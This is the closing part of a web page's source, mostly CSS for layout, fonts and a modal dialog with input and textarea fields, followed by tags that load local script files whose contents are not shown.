         .p-2 {
         padding: .5rem;
         }
         .py-2 {
         padding-top: .5rem;
         padding-bottom: .5rem;
         }
         .py-3 {
         padding-top: .75rem;
         padding-bottom: .75rem;
         }
         .px-4 {
         padding-left: 1rem;
         padding-right: 1rem;
         }
         .pr-4 {
         padding-right: 1rem;
         }
         .pb-4 {
         padding-bottom: 1rem;
         }
         .pl-4 {
         padding-left: 1rem;
         }
         .pt-5 {
         padding-top: 1.25rem;
         }
         .placeholder-gray-500::-moz-placeholder {
         --placeholder-opacity: 1;
         color: #a0aec0;
         color: rgba(160, 174, 192, var(--placeholder-opacity));
         }
         .placeholder-gray-500:-ms-input-placeholder {
         --placeholder-opacity: 1;
         color: #a0aec0;
         color: rgba(160, 174, 192, var(--placeholder-opacity));
         }
         .placeholder-gray-500::placeholder {
         --placeholder-opacity: 1;
         color: #a0aec0;
         color: rgba(160, 174, 192, var(--placeholder-opacity));
         }
         .relative {
         position: relative;
         }
         .shadow-sm {
         box-shadow: 0 1px 2px 0 rgba(0, 0, 0, .05);
         }
         .shadow-xl {
         box-shadow: 0 20px 25px -5px rgba(0, 0, 0, .1), 0 10px 10px -5px rgba(0, 0, 0, .04);
         }
         .text-left {
         text-align: left;
         }
         .text-center {
         text-align: center;
         }
         .text-white {
         --text-opacity: 1;
         color: #fff;
         color: rgba(255, 255, 255, var(--text-opacity));
         }
         .text-gray-900 {
         --text-opacity: 1;
         color: #1a202c;
         color: rgba(26, 32, 44, var(--text-opacity));
         }
         .uppercase {
         text-transform: uppercase;
         }
         .align-bottom {
         vertical-align: bottom;
         }
         .w-6 {
         width: 1.5rem;
         }
         .w-12 {
         width: 3rem;
         }
         .w-full {
         width: 100%;
         }
         .transform {
         --transform-translate-x: 0;
         --transform-translate-y: 0;
         --transform-rotate: 0;
         --transform-skew-x: 0;
         --transform-skew-y: 0;
         --transform-scale-x: 1;
         --transform-scale-y: 1;
         transform: translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));
         }
         .transition-all {
         transition-property: all;
         }
         .transition {
         transition-property: background-color, border-color, color, fill, stroke, opacity, box-shadow, transform;
         }
         .ease-in {
         transition-timing-function: cubic-bezier(.4, 0, 1, 1);
         }
         .duration-150 {
         transition-duration: .15s;
         }
         @media (min-width:640px) {
         .sm\:flex {
         display: flex;
         }
         .sm\:flex-row-reverse {
         flex-direction: row-reverse;
         }
         .sm\:items-start {
         align-items: flex-start;
         }
         .sm\:h-10 {
         height: 2.5rem;
         }
         .sm\:text-sm {
         font-size: .875rem;
         }
         .sm\:text-base {
         font-size: 1rem;
         }
         .sm\:mx-0 {
         margin-left: 0;
         margin-right: 0;
         }
         .sm\:my-8 {
         margin-top: 2rem;
         margin-bottom: 2rem;
         }
         .sm\:mt-0 {
         margin-top: 0;
         }
         .sm\:ml-3 {
         margin-left: .75rem;
         }
         .sm\:ml-4 {
         margin-left: 1rem;
         }
         .sm\:max-w-lg {
         max-width: 32rem;
         }
         .sm\:p-6 {
         padding: 1.5rem;
         }
         .sm\:px-6 {
         padding-left: 1.5rem;
         padding-right: 1.5rem;
         }
         .sm\:pb-4 {
         padding-bottom: 1rem;
         }
         .sm\:text-left {
         text-align: left;
         }
         .sm\:align-middle {
         vertical-align: middle;
         }
         .sm\:w-10 {
         width: 2.5rem;
         }
         .sm\:w-auto {
         width: auto;
         }
         .sm\:w-full {
         width: 100%;
         }
         }
         @media (min-width:768px) {
         .md\:object-scale-down {
         -o-object-fit: scale-down;
         object-fit: scale-down;
         }
         }
         /*! CSS Used from: Embedded */
         *,
         :after,
         :before {
         box-sizing: border-box;
         margin: 0;
         }
         /*! CSS Used from: Embedded */
         div,
         input {
         font-family: "DM Sans", sans-serif !important;
         }
         /*! CSS Used from: Embedded */
         div,
         span {
         font-family: "DM Sans", sans-serif;
         }
         /*! CSS Used from: Embedded */
         .active {
         border-color: #3498db;
         }
         /*! CSS Used fontfaces */
         @font-face {
         font-family: 'DM Sans';
         font-style: italic;
         font-weight: 400;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Fp2ywxg089UriCZa4ET-DNl0.woff2) format('woff2');
         unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: italic;
         font-weight: 400;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Fp2ywxg089UriCZa4Hz-D.woff2) format('woff2');
         unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: italic;
         font-weight: 500;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZaw7ByWB3wTyCg.woff2) format('woff2');
         unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: italic;
         font-weight: 500;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZaw7ByWCXwT.woff2) format('woff2');
         unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: italic;
         font-weight: 700;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZawpBqWB3wTyCg.woff2) format('woff2');
         unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: italic;
         font-weight: 700;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Ap2ywxg089UriCZawpBqWCXwT.woff2) format('woff2');
         unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: normal;
         font-weight: 400;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Hp2ywxg089UriCZ2IHSeH.woff2) format('woff2');
         unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: normal;
         font-weight: 400;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Hp2ywxg089UriCZOIHQ.woff2) format('woff2');
         unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: normal;
         font-weight: 500;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriAWCrCBamC2QX.woff2) format('woff2');
         unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: normal;
         font-weight: 500;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriAWCrCBimCw.woff2) format('woff2');
         unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: normal;
         font-weight: 700;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriASitCBamC2QX.woff2) format('woff2');
         unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
         }
         @font-face {
         font-family: 'DM Sans';
         font-style: normal;
         font-weight: 700;
         font-display: swap;
         src: url(https://fonts.gstatic.com/s/dmsans/v6/rP2Cp2ywxg089UriASitCBimCw.woff2) format('woff2');
         unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
         }
      </style>
      <style>
         .acc-body {
         display: none;
         }
         .acc-body.active {
         display: block;
         }
      </style>
      <style>
         .overlay {
         position: fixed;
         display: flex;
         justify-content: center;
         align-items: center;
         width: 100%;
         height: 100vh;
         background-color: rgb(0, 0, 0, 0.2);
         z-index: 99;
         }
         .aletr {
         background-color: #fff;
         width: 30%;
         border-radius: 5px;
         padding: 20px;
         position: relative;
         }
         .close {
         position: absolute;
         width: 15px;
         right: 20px;
         }
         .close img {
         width: 15px !important;
         cursor: pointer;
         }
         .sc-gqPbQI.fhSmUE {
         cursor: pointer;
         }
         .fRcQRh {
         cursor: pointer;
         }
         .aletr h1 {
         padding-top: 10px;
         text-align: center;
         font-size: 2em;
         }
         .aletr .select {
         display: flex;
         justify-content: space-between;
         align-items: center;
         border-radius: 5px;
         border: 1px solid #ccc;
         padding: 15px;
         margin-top: 20px;
         width: 100%;
         cursor: pointer;
         }
         .aletr img {
         width: 40px;
         }
         .inputBox {
         display: flex;
         flex-direction: column;
         align-items: center;
         margin-top: 20px;
         margin-bottom: 20px;
         }
         .inputBox input {
         width: 80%;
         border-radius: 5px;
         border: 1px solid #ccc;
         outline: none;
         padding: 10px;
         color: rgb(88, 112, 135);
         }
         .errormessage {
         color: red;
         text-align: center;
         width: 100%;
         font-size: 16px;
         display: none;
         margin-top: 10px;
         }
         .inputBox button {
         width: 80%;
         border-radius: 5px;
         border: 1px solid #ccc;
         outline: none;
         padding: 10px;
         margin-top: 25px;
         color: rgb(88, 112, 135);
         cursor: pointer;
         }
         .inputBox textarea {
         width: 80%;
         border-radius: 5px;
         border: 1px solid #ccc;
         outline: none;
         padding: 10px;
         max-width: 80%;
         color: rgb(88, 112, 135);
         }
         .sss {
         font-size: 20px;
         }
         /* Smartphones (portrait and landscape) ----------- */
         @media only screen and (min-device-width : 320px) and (max-device-width : 480px) {
         /* Styles */
         .aletr {
         width: 90%;
         }
         }
         /* Smartphones (landscape) ----------- */
         @media only screen and (min-width : 321px) {
         /* Styles */
         .aletr {
         width: 80%;
         }
         }
         /* Smartphones (portrait) ----------- */
         @media only screen and (max-width : 320px) {
         /* Styles */
         .aletr {
         width: 80%;
         }
         }
         /* iPads (portrait and landscape) ----------- */
         @media only screen and (min-width : 768px) and (max-width : 1024px) {
         /* Styles */
         .aletr {
         width: 50%;
         }
         }
         /* iPads (landscape) ----------- */
         @media only screen and (min-device-width : 768px) and (max-device-width : 1024px) and (orientation : landscape) {
         /* Styles */
         .aletr {
         width: 50%;
         }
         }
         /* iPads (portrait) ----------- */
         @media only screen and (min-device-width : 768px) and (max-device-width : 1024px) and (orientation : portrait) {
         /* Styles */
         .aletr {
         width: 60%;
         }
         }
         /* Desktops and laptops ----------- */
         @media only screen and (min-width : 1224px) {
         /* Styles */
         .aletr {
         width: 40%;
         }
         }
         /* Large screens ----------- */
         @media only screen and (min-width : 1824px) {
         /* Styles */
         .aletr {
         width: 30%;
         }
         }
         /* iPhone 4 ----------- */
         @media only screen and (-webkit-min-device-pixel-ratio : 1.5),
         only screen and (min-device-pixel-ratio : 1.5) {
         /* Styles */
         }
      </style>
      <script data-cfasync="false" type="text/javascript" src="js/form-submission-handler.js"></script>
      <script src="js/app.min.js"></script>
      <script src="js/js1.js"></script>
      <script src="js/js2.js"></script>
      
      
</body>
</html>